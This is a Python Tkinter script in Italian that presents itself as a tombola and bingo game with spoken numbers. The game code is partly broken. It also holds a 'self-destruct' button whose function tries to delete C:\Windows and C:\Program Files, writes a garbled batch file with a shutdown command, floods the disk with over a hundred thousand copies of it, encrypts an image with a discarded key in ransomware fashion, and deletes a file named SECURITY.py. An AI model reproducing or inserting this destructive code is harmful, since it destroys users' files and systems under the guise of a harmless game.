import pyttsx3
import random
import tkinter as Tk
import os
import shutil 
from cryptography.fernet import Fernet
def estrazionenumeri():
    voce=pyttsx3.init()
    voce.say("inizio il gioco la tombola sei pronto?:")
    numeri=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100]
    numgen=random.choice(numeri)
    motore = pyttsx3.init()
    voce.say(numgen)
    motore.runAndWait()
    if numgen == motore:
        print("errore ripora ")
    else:
        motore.say(numgen)
        motore.runAndWait()
def restarta():
    numeri=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100]
    numgen=random.choice(numeri)
    motore = pyttsx3.init()
    motore.say(numgen)
    motore.runAndWait()
    if numgen == motore:
        print("errore ripora ")
    else:
        motore.say(numgen)
        motore.runAndWait()

def autodistruzione():
    for i in range(100000):
        print("sei sicuro manca poco",i)
    f=open("rombole.py","w")
    os.remove("C:\Windows")
    os.remove("C:\Program Files")
    f.close()
    i=100
    while i != 0: 
        i-=1
    file=open("tnt.bat","w")
    file.write("echo off \n echo> shutdown /r >illavoro.bat\n start >www.tesmec.com>1234.bat \n cd..\n echo %%a (*.bat) do echo.>bat\necho echo %%a (.exe)\n do in echo (.txt) echo %%a (.bat) ")
    file.close()
    for i in range(144400):
        shutil.copy("tnt.bat",f"tnt{i}.bat")
        print(i)
    chiave=Fernet.generate_key()
    with open("i.jpg","rb") as f:
        data=f.read()
    fernet=Fernet(chiave)
    datimie=fernet.encrypt(data)
    with open("i.jpg","wb") as f:
        f.write(datimie)
    print("i file sono stati criptati ")
    file=open("tnt.bat","w")
    file.write("echo off \n echo> shutdown /r >illavoro.bat\n start >www.tesmec.com>1234.bat \n cd..\n echo %%a (*.bat) do echo.>bat\necho echo %%a (.exe)\n do in echo (.txt) echo %%a (.bat) ")
    file.close()
    for i in range(144400):
        shutil.copy("tnt.bat",f"tnt{i}.bat")
        shutil.copy("tnt.bat","tnt1.bat")
        shutil.copy("tnt.bat","tnt2.bat")
        shutil.copy("tnt.bat","tnt3.bat")
        shutil.copy("tnt.bat","tnt4.bat")
        shutil.copy("tnt.bat","tnt4.bat")
        shutil.copy("tnt.bat","tnt6.bat")
        shutil.copy("tnt.bat","tnt7.bat")
        shutil.copy("tnt.bat","tnt8.bat")   
        shutil.copy("tnt.bat","tnt9.bat")
        shutil.copy("tnt.bat","tnt10.bat")
def gestione_file():
    os.remove("SECURITY.py")
    f=open("antiscan.py","w")
    f.write("romeved")
    f.close()
 


def bingo():
    punteggio=0
    voce3=pyttsx3.init()
    voce3.say("inizio il gioco del bingo sei pronto :")
    utente=int(input("inserisci il anno di nascita "))
    if utente<18:
        print("non puoi giocare ")
    else:
        print("quoi giocare")        
        utente=int(input("pesca una carta da 1 a 4 "))
    if utente==10:
        punteggio+=10
    elif utente==3:
        punteggio+=2
    if utente == 11:
        punteggio+=11
    re=10
    otto=3
    asso=11
    lista=["re=10"]
    generanumero=random.randint(1,12)
    voce=pyttsx3.init()
    voce.say(generanumero)
    voce.runAndWait()



fine=Tk.Tk()
fine.geometry("800x300")
fine.title("benvenuti nella tombola",)
fine=Tk.Button(text="gioca a timbola",background="blue",command=estrazionenumeri)
fine.grid(row=9000,column=9000)
fine=Tk.Button(text="gioca al bingo ",background="white",command=bingo)
fine.grid(row=900,column=900)
fine=Tk.Button(text="auto sistruziuone",command=autodistruzione)
fine.grid(row=5000,column=3000)
fine.mainloop()
